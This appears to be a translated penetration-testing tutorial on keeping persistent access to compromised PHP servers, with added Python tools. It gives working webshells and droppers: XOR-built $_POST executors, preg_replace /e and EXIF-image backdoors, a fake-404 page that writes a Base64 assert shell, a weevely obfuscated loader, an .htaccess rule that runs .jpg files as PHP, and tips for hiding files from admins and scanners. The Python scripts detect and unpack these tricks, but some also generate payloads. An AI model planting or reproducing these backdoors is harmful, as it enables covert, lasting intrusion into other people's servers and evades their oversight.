0x00 Preface
After a successful penetration test you usually want to keep your access for longer, so leaving a backdoor matters. Backdoors can be planted at many levels, including but not limited to database privileges, web-application privileges and system user accounts. This article collects some ideas on hiding the common kinds of backdoor, for educational purposes.
Take PHP web backdoors as the example. The most common one-liner looks like this:

```php
<?php @eval($_POST['cmd']); ?>
```

or like this:

```php
<?php @assert($_POST['cmd']); ?>
```

The only difference is which function is called; to see which functions are disabled on a target, search for disable_functions in php.ini.
But ops staff have many straightforward ways to find our shells, for example:

- comparing against a file backup and spotting anomalies by filename, modification time or size;
- running a webshell scanning script such as scanbackdoor.php, pecker or shelldetect.php, or any of the various scanners;
- searching access.log for the backdoor's requests;
- a WAF that blocks our requests and writes a warning log.

Against these common detection methods, the following seven techniques help keep a shell hidden.
0x01 Evasion

A glance at the code of any backdoor scanner shows that leaving a well-known, notorious keyword in the shell is out of the question. Common keywords include:

- System command execution: system, passthru, shell_exec, exec, popen, proc_open
- Code execution: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
- File inclusion and I/O: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

People used to cleverly write $_POST[0]($_POST[1]) to execute commands, but that no longer escapes scanners either. Still, there are endless variations and no limit to how the string can be constructed. Tudouya posted [a construction technique](http://www.freebuf.com/articles/web/33824.html) on FreeBuf:
```php
<?php
@$_++;                    // $_ = 1
$__ = ("#" ^ "|");        // $__ = _
$__ .= ("." ^ "~");       // _P
$__ .= ("/" ^ "`");       // _PO
$__ .= ("|" ^ "/");       // _POS
$__ .= ("{" ^ "/");       // _POST
${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>
```
Once constructed it should not, of course, be written this obviously; squeezed onto one line:

```php
<?php @$_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$__}[!$_](${$__}[$_]);?>
```

Pad it with some ordinary-looking code as camouflage and a simple "undetectable" shell sample is ready. It runs without errors, passes ordinary scanners, and can also be used to drop new temporary shells.
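The construction above can be both produced and undone mechanically. The following Python script is an added example, not part of the original article: php_xor_expr() generates the same kind of ("a"^"b") expression for any keyword, and resolve_strings() does what a scanner can do with it, evaluating the XOR literals and the = / .= assignments statically so the assembled name shows up in plain text. The watch-list of names and the regex-based approach are my own assumptions; the sample snippet is the page's construction.

```python
"""Generate and reverse the ("a"^"b") string construction shown above."""
import re
import string

# Characters allowed inside the generated double-quoted literals: printable ASCII
# without the quote, the backslash and the dollar sign ("$" followed by a letter
# would start variable interpolation inside a PHP double-quoted string).
ALPHABET = [c for c in string.ascii_letters + string.digits + string.punctuation
            if c not in '"\\$']


def xor_pairs(target, alphabet=ALPHABET):
    """For every character of target, find two alphabet characters whose XOR is it."""
    pairs = []
    for ch in target:
        for a in alphabet:
            b = chr(ord(a) ^ ord(ch))
            if b in alphabet:
                pairs.append((a, b))
                break
        else:
            raise ValueError("no printable pair for %r" % ch)
    return pairs


def php_xor_expr(target):
    """PHP expression ("a"^"b").("c"^"d")... that evaluates to target (the $__ trick)."""
    return ".".join('("%s"^"%s")' % (a, b) for a, b in xor_pairs(target))


# The reverse direction: what a scanner can do statically.
XOR_LITERAL = re.compile(r'\(\s*"([^"\\])"\s*\^\s*"([^"\\])"\s*\)')   # ("x"^"y")
CONCAT = re.compile(r'"\s*\.\s*"')                                     # "ab"."cd" -> "abcd"
ASSIGN = re.compile(r'(\$[A-Za-z_]\w*)\s*(\.?=)\s*"([^"]*)"\s*;')       # $v = "..."; / $v .= "...";


def resolve_strings(php_src):
    """Evaluate XOR literals, literal concatenations and = / .= assignments.

    Returns {variable: string}. Limited to single-character double-quoted literals
    whose XOR result is itself printable, which covers the construction above;
    escape sequences and literals containing '.' are not handled.
    """
    src = XOR_LITERAL.sub(lambda m: '"%s"' % chr(ord(m.group(1)) ^ ord(m.group(2))), php_src)
    src = CONCAT.sub("", src)
    values = {}
    for name, op, literal in ASSIGN.findall(src):
        values[name] = (values.get(name, "") if op == ".=" else "") + literal
    return values


# Names worth flagging once the construction has been undone (assumed watch-list).
WATCHLIST = {"_POST", "_GET", "_REQUEST", "_COOKIE", "eval", "assert", "system", "passthru",
             "shell_exec", "exec", "popen", "proc_open", "create_function", "preg_replace"}


def flag_hidden_keywords(php_src):
    """Watch-listed names that the snippet only assembles at runtime."""
    return [v for v in resolve_strings(php_src).values() if v in WATCHLIST]


# The construction from the page, kept here as test input.
PAGE_SAMPLE = """<?php
@$_++;
$__=("#"^"|");
$__.=("."^"~");
$__.=("/"^"`");
$__.=("|"^"/");
$__.=("{"^"/");
${$__}[!$_](${$__}[$_]);
?>"""

if __name__ == "__main__":
    print(php_xor_expr("_POST"))
    print(resolve_strings(PAGE_SAMPLE))         # {'$__': '_POST'}
    print(flag_hidden_keywords(PAGE_SAMPLE))    # ['_POST']
```

Running it prints a fresh ("a"^"b") chain for _POST, then shows that resolve_strings() turns the page's snippet back into $__ = "_POST", which is exactly the string the scanner's keyword list was looking for.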
0x02 Syntax features

Executing commands with the help of PHP's syntax is also interesting. PHP parses double-quoted strings for variables and substitutes their values, e.g.:

```php
"${@eval(phpinfo())}"
```

Inside a double-quoted string, `${...}` makes PHP evaluate the expression in the braces (the result is then used as a variable name), and the `@` keeps execution going after the error.

From there you can build a hidden backdoor, but here we force the command to be executed inside a function, namely preg_replace:

```php
<?php @preg_replace("//e", $_POST['cmd'], ""); ?>
```

This form is obviously on scanner blacklists already, so modify it slightly:

```php
<?php
function funfunc($str) {}
echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc("\1")', $_POST["cmd"]);
?>
```

It runs, and the scanner finds nothing.

The mechanism is obvious: when the regex captures `{${phpinfo()}}` (posted as `<title>{${phpinfo()}}</title>`) and the /e modifier passes it to funfunc inside a double-quoted string, variable parsing executes the code:

```php
funfunc("{${phpinfo()}}")
```

A different approach, where the same `{${...}}` payload is delivered via GET:

```php
<?php @assert("\$arr=\"".$_GET['cmd']."\";"); ?>
```

Note that the preg_replace /e modifier is deprecated since PHP 5.5 and removed in PHP 7.0, so the preg_replace variants only work on older installations.
0x03 Inclusion

File inclusion is something everyone has played with, but including has its own tricks. A plain include might just pull in a .txt or .jpg, or even deliberately leave an inclusion vulnerability behind, but scanners find those easily, and the extra included files are also easy to spot.
Look at this script:

```php
<?php
if (@isset($_GET['content'])) {
    $fp = fopen('README', 'w');
    file_put_contents('README', "<?php\r\n");
    @file_put_contents('README', $_GET['content'], FILE_APPEND);
    fclose($fp);
    require 'README';
}
?>
```
This solves one problem: the file to be required is generated from the request and then included. Unfortunately file_put_contents and similar functions are too sensitive and are easily flagged by a scan.

The generate-on-access approach: the shell is only written when the page is visited.

```php
<?php @fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'), 'w'), base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg==')); ?>
```

(The two Base64 strings decode to `plugin_m.php` and `<?php @assert($_POST['cmd']);?>`.)
This evades some scanners, but the pattern is still conspicuous, and the newly written file needs some simple hiding of its own to avoid antivirus. Newer concepts such as heuristic detection are not considered here.

When even this does not fit the situation, resourceful attackers pick up images again:

```php
<?php $exif = exif_read_data('./lol.jpg'); preg_replace($exif['Make'], $exif['Model'], ''); ?>
```

Reference: A backdoor hidden in a JPG image in EXIF

This time it is no longer the simple `copy /b` image trojan; instead preg_replace executes a specific field of the file, which works well. You may be prompted with "Call to undefined function exif_read_data()" here: edit php.ini to add extension=php_exif.dll, and make sure it is loaded after extension=php_mbstring.dll.

As you can see, this image backdoor relies on preg_replace's /e modifier, on PHP variable parsing for execution, on Base64 encoding, and finally on a file that is identified as an image, to form a complete shell: a small reminder for those hiding a backdoor for the first time.

Of course, as long as there is an inclusion point, the included file can take many forms, even an error_log (although that may be considered closed off); the limit is imagination.
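To make the image backdoor concrete, the Python below is an added example (not the referenced article's code, nor this page's): it builds a minimal JPEG whose EXIF Make field holds a /e regex and whose Model field holds the replacement, reads both back the way exif_read_data() would, and applies the check a defender can run over uploaded images. It assumes the payload layout the snippet above implies (Make = pattern, Model = replacement); the tag numbers 0x010F and 0x0110 are the standard EXIF ones, the JPEG is hand-built with a single APP1 segment, and the sample strings are constructed.

```python
"""Build a minimal JPEG carrying the EXIF payload described above, read the fields
back the way exif_read_data() would, and flag the tell-tale content."""
import base64
import re
import struct

TAG_MAKE, TAG_MODEL = 0x010F, 0x0110   # EXIF/TIFF tag numbers for Make and Model
ASCII = 2                              # TIFF field type: NUL-terminated ASCII


def build_exif_jpeg(make, model):
    """SOI, one APP1 'Exif' segment (big-endian TIFF, IFD0 with Make and Model), EOI.

    Hand-built so it runs offline; a camera file has far more structure, but this
    is all that the exif_read_data() call in the snippet above needs.
    """
    fields = [(TAG_MAKE, make.encode("latin-1") + b"\0"),
              (TAG_MODEL, model.encode("latin-1") + b"\0")]
    # TIFF header (8) + entry count (2) + entries (12 each) + next-IFD offset (4)
    data_off = 8 + 2 + 12 * len(fields) + 4
    entries, blob = b"", b""
    for tag, val in fields:
        if len(val) <= 4:        # short values are stored inside the entry itself
            entries += struct.pack(">HHI4s", tag, ASCII, len(val), val.ljust(4, b"\0"))
        else:                    # longer ones go after the IFD, referenced by offset
            entries += struct.pack(">HHII", tag, ASCII, len(val), data_off + len(blob))
            blob += val
    tiff = (b"MM\x00\x2a" + struct.pack(">I", 8) + struct.pack(">H", len(fields))
            + entries + b"\0\0\0\0" + blob)
    app1 = b"Exif\0\0" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def read_exif_strings(jpeg):
    """{tag: str} for the ASCII IFD0 entries of the first APP1 Exif segment."""
    if jpeg[:2] != b"\xff\xd8":
        return {}
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        seglen = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        seg = jpeg[pos + 4:pos + 2 + seglen]
        if marker == 0xE1 and seg.startswith(b"Exif\0\0"):
            tiff = seg[6:]
            e = ">" if tiff[:2] == b"MM" else "<"
            ifd = struct.unpack(e + "I", tiff[4:8])[0]
            count = struct.unpack(e + "H", tiff[ifd:ifd + 2])[0]
            out = {}
            for i in range(count):
                entry = tiff[ifd + 2 + 12 * i:ifd + 14 + 12 * i]
                tag, typ, n = struct.unpack(e + "HHI", entry[:8])
                if typ != ASCII:
                    continue
                if n <= 4:
                    raw = entry[8:8 + n]
                else:
                    off = struct.unpack(e + "I", entry[8:12])[0]
                    raw = tiff[off:off + n]
                out[tag] = raw.rstrip(b"\0").decode("latin-1")
            return out
        if marker == 0xDA:       # start of scan: image data follows, no more metadata
            break
        pos += 2 + seglen
    return {}


# A field that is a PHP regex with the /e modifier, e.g. "/.*/e" (assumes '/' delimiters).
E_MODIFIER = re.compile(r"^/.*/[A-Za-z]*e[A-Za-z]*$")
CODE_HINTS = re.compile(r"<\?php|\beval\s*\(|\bassert\s*\(|base64_decode|\$_(?:POST|GET|REQUEST)")


def exif_backdoor_indicators(jpeg):
    """Reasons an image looks like the preg_replace($exif['Make'], $exif['Model'], '') dropper."""
    tags = read_exif_strings(jpeg)
    make, model = tags.get(TAG_MAKE, ""), tags.get(TAG_MODEL, "")
    findings = []
    if E_MODIFIER.match(make):
        findings.append("Make is a regex with the /e modifier: %r" % make)
    for name, val in (("Make", make), ("Model", model)):
        if CODE_HINTS.search(val):
            findings.append("%s contains PHP code: %r" % (name, val))
    return findings


# Constructed samples: an ordinary camera file and the backdoored one.
CLEAN_JPEG = build_exif_jpeg("Canon", "Canon EOS 5D")
EVIL_JPEG = build_exif_jpeg(
    "/.*/e", "eval(base64_decode('%s'))" % base64.b64encode(b"phpinfo();").decode())

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_JPEG), ("evil", EVIL_JPEG)):
        print(label, read_exif_strings(img), exif_backdoor_indicators(img))
```

The same read_exif_strings() plus exif_backdoor_indicators() pair can be run over every image in an upload directory; on the constructed evil file it reports both the /e pattern in Make and the eval/base64_decode in Model, while the clean file produces nothing.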
0x04 Stealth

To keep visitors from noticing the backdoor, a smart security researcher disguises it:

```php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<title>404 Not Found</title>
<body>
<p>The requested URL was not found on this server.</p>
</body>
<?php
@preg_replace("/[checksql]/e", $_POST['cmd'], "saft");
?>
```

With the HTML above, the page now renders as a fake 404 to anyone who browses to it. But that only hides it from visitors. For log analysis, to blend in better among a large number of entries, construct the following script:
```php
<?php
header('HTTP/1.1 404 Not Found');
ob_start();
@fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'), 'w'), base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));
ob_end_clean();
?>
```

Visiting it returns a genuine-looking 404, and the log records a 404 as well, but at that moment the script we want to connect to has been generated in the current directory.
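What the 404 disguise does and does not hide can be checked from the defender's side. The Python below is an added example, not from the article: it parses combined-format access-log lines and flags 404 responses that the web server could not have produced itself, because the requested file exists on disk, or because the response carried no body (a server-generated error page always has one). The log lines and the document-root listing are constructed; the IPs, paths and timestamps are assumptions.

```python
"""Spot the fake-404 dropper above in an access log: 404s the server could not have sent."""
import re

# Apache/nginx "combined" format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')

# Constructed sample: normal traffic, two genuine 404s from a scanner, one visit to the
# disguised dropper (served as 404 with an empty body), then the first POST to the
# file it wrote. IPs, paths and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2015:13:55:36 +0800] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2015:13:55:37 +0800] "GET /css/site.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2015:13:58:02 +0800] "GET /wp-login.php HTTP/1.1" 404 287 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2015:13:58:03 +0800] "GET /phpmyadmin/ HTTP/1.1" 404 287 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2015:14:01:15 +0800] "GET /images/cache.php HTTP/1.1" 404 - "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2015:14:01:20 +0800] "POST /images/plugin_m.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
"""

# Constructed listing of what really exists under the document root; in practice
# build it with os.walk() over the web root.
DOCROOT_FILES = {"/index.php", "/css/site.css", "/images/cache.php", "/images/plugin_m.php"}


def parse_log(text):
    """Yield one dict per well-formed line; a size of '-' (no body) becomes 0."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
            rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
            yield rec


def suspicious_404s(text, existing_paths):
    """404s whose target exists on disk, or that came back with no body at all.

    The server's own 404 always carries an error page, and a path that exists cannot
    produce a real 404; either way the status was set by a script, as above.
    """
    hits = []
    for rec in parse_log(text):
        if rec["status"] != 404:
            continue
        path = rec["path"].split("?", 1)[0]
        reasons = []
        if path in existing_paths:
            reasons.append("file exists on disk")
        if rec["size"] == 0:
            reasons.append("empty 404 body")
        if reasons:
            hits.append((rec["ip"], path, reasons))
    return hits


def posts_without_prior_get(text):
    """Paths that only ever receive POSTs: a dropped shell is used by the connector
    straight away and never browsed. Heuristic; legitimate form handlers also match."""
    seen_get, flagged = set(), []
    for rec in parse_log(text):
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "GET":
            seen_get.add(path)
        elif rec["method"] == "POST" and path not in seen_get and path not in flagged:
            flagged.append(path)
    return flagged


if __name__ == "__main__":
    print(suspicious_404s(SAMPLE_LOG, DOCROOT_FILES))
    print(posts_without_prior_get(SAMPLE_LOG))
```

On the constructed log the two scanner 404s pass (the files do not exist and the 287-byte error page was served), while the dropper's hit is reported twice over: the path exists and the body was empty. The second heuristic then points straight at plugin_m.php, which only ever sees POSTs.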
0x05 Obfuscation

Those who have used the weevely tool know that the "undetectable" shell it generates looks like this:

```php
<?php
$penh = "sigpvaw4oyxjyygixlfc2xpy2uojgesgijgmojgepltgimpkskpgikttly2hvicc8lycgiujgigsugijz4no30=";
$kthe = "JGEPPJGIMPEYRRPSGIDWCYC7ZWNOBYANPCCGIUGIJGSUJZ4NOGI2V2YWWOYGIMFZZTY0X2GIRLY2GI9KGIZSHWCMVN";
$ftdf = str_replace("w", "", "stwrw_wrwepwlwawcwe");
$wmmi = "X3jlcgigxhy2ugioyxgijyyxkojy9bxlx3pvgixzxs8nlcgicvxhmvjyksigfycmf5kccnlccrgijyk";
$zrmt = "Jgm9j2nvdwgi50jzskgiyt0gikx0ngipt0tjrgittpzihyzxnldcgkysk9psgidvbycggijgiiygjgmo";
$smgv = $ftdf("f", "", "bfafsfef6f4_fdfefcodfe");
$jgfi = $ftdf("l", "", "lclrlelaltel_functlilon");
$rdwm = $jgfi("", $smgv($ftdf("gi", "", $zrmt . $kthe . $wmmi . $penh)));
$rdwm();
?>
```
After connecting, the terminal looks like this (PS: forgot to change the terminal encoding :( ).

The evasion works by generating randomly named variables in fixed positions, then using str_replace to strip the padding characters and recover str_replace, base64_decode and create_function, which decode and execute the command. Of course, this is obfuscation at the code level to avoid scanners.
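Stripping the padding and decoding the Base64 is mechanical, so a triage script can recover the payload without ever running it. The Python below is an added example, not weevely's code or the article's: a small evaluator for just the PHP subset these loaders use (string literals, concatenation, str_replace, base64_decode, create_function and a call through a variable). Because the Base64 blobs on the page lost their letter case in extraction, the example generates its own loader in the same shape, with the sample's variable names and padding trick; the payload body and the filler are constructed.

```python
"""Statically undo a weevely-style loader: strip padding, decode Base64, read the payload."""
import base64
import re

TOKEN = re.compile(r'\s*(?:(\$[A-Za-z_]\w*)|"([^"]*)"|([A-Za-z_]\w*)|([.(),=;]))')


class PhpMiniEval:
    """Evaluates only what these loaders use: string literals, variables, '.' concatenation,
    and calls (by name or through a variable) to str_replace, base64_decode and
    create_function. Anything else raises, which is itself a useful triage signal."""

    def __init__(self):
        self.vars = {}        # $name -> string value
        self.closures = {}    # create_function() results -> body source
        self.executed = []    # bodies of closures invoked as $f();

    def run(self, src):
        src = src.replace("<?php", "").replace("?>", "").strip()
        self.toks, self.i = self._tokenize(src), 0
        while self.i < len(self.toks):
            kind, text = self.toks[self.i]
            if kind == "var" and self.toks[self.i + 1] == ("op", "="):   # $v = expr;
                self.i += 2
                self.vars[text] = self._expr()
            else:                                                        # expr; (a call)
                self._expr()
            self._expect(";")
        return self

    def _tokenize(self, src):
        toks, pos = [], 0
        while pos < len(src):
            m = TOKEN.match(src, pos)
            if not m:
                raise ValueError("unsupported syntax at %r" % src[pos:pos + 20])
            pos = m.end()
            var, lit, name, op = m.groups()
            toks.append(("var", var) if var else ("str", lit) if lit is not None
                        else ("name", name) if name else ("op", op))
        return toks

    def _expect(self, op):
        if self.toks[self.i] != ("op", op):
            raise ValueError("expected %r" % op)
        self.i += 1

    def _expr(self):
        value = self._primary()
        while self.i < len(self.toks) and self.toks[self.i] == ("op", "."):
            self.i += 1
            value += self._primary()
        return value

    def _primary(self):
        kind, text = self.toks[self.i]
        self.i += 1
        if kind == "str":
            return text
        value = self.vars.get(text, "") if kind == "var" else text
        if self.i < len(self.toks) and self.toks[self.i] == ("op", "("):
            self.i += 1
            args = []
            while self.toks[self.i] != ("op", ")"):
                args.append(self._expr())
                if self.toks[self.i] == ("op", ","):
                    self.i += 1
            self.i += 1
            return self._call(value, args)   # $f(...) calls whatever name $f holds
        if kind == "name":
            raise ValueError("bare identifier %r" % text)
        return value

    def _call(self, fn, args):
        if fn == "str_replace":
            return args[2].replace(args[0], args[1])
        if fn == "base64_decode":
            return base64.b64decode(args[0]).decode("latin-1")
        if fn == "create_function":
            name = "\x00lambda_%d" % (len(self.closures) + 1)   # PHP's naming for these
            self.closures[name] = args[1]
            return name
        if fn in self.closures:
            self.executed.append(self.closures[fn])
            return ""
        raise ValueError("unsupported call %r" % fn)


def padded(s, filler, every=5):
    # Interleave filler into s, the way the loader above strings junk into its Base64.
    return filler.join(s[i:i + every] for i in range(0, len(s), every))


def constructed_loader(body='@eval($_POST["c"]);'):
    """A loader in the shape of the sample above (its variable names, its str_replace trick),
    generated here because the Base64 blobs on the page lost their letter case."""
    b64 = base64.b64encode(body.encode()).decode()
    filler = next(f for f in ("gi", "qz", "xk") if f not in b64)   # must not occur in the data
    half = len(b64) // 2
    return '''<?php
$kthe = "%s";
$penh = "%s";
$ftdf = str_replace("w", "", "stwrw_wrwepwlwawcwe");
$smgv = $ftdf("f", "", "bfafsfef6f4_fdfefcodfe");
$jgfi = $ftdf("l", "", "lclrlelaltel_functlilon");
$rdwm = $jgfi("", $smgv($ftdf("%s", "", $kthe . $penh)));
$rdwm();
?>''' % (padded(b64[:half], filler), padded(b64[half:], filler), filler)
```

`PhpMiniEval().run(constructed_loader())` leaves the recovered function names in `.vars` ($ftdf is str_replace, $smgv is base64_decode, $jgfi is create_function) and the decoded payload in `.executed`, so the shell's real body can be read from a file without ever executing it.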
Other common obfuscation methods:

- modify the file timestamps;
- rename the file and move it into a folder after uploading, so nothing stands out in a directory listing;
- fake the file size (at least make it look like a normal script);
- choose the hiding path carefully and access it as little as possible;
- malformed directory names such as %20.

Directories named with a space are relatively easy to find, though.
0x06 Parsing

Use .htaccess to add a parsing backdoor, for example:

```apache
AddType application/x-httpd-php .jpg
```

The example above used a weevely-generated shell.
0x07 Summary

Summing up, most of the methods above are nothing more than deliberately constructing a vulnerability: however inventive vulnerable code can be, the backdoor can be just as inventive. It can be written slender and elegant or simple and crude; only the occasion differs. If you integrate these ideas well, constructing your own hidden shell is not difficult. The above is only a summary of experience; if you have interesting ideas, please share them.
PHP backdoor hiding and maintenance tips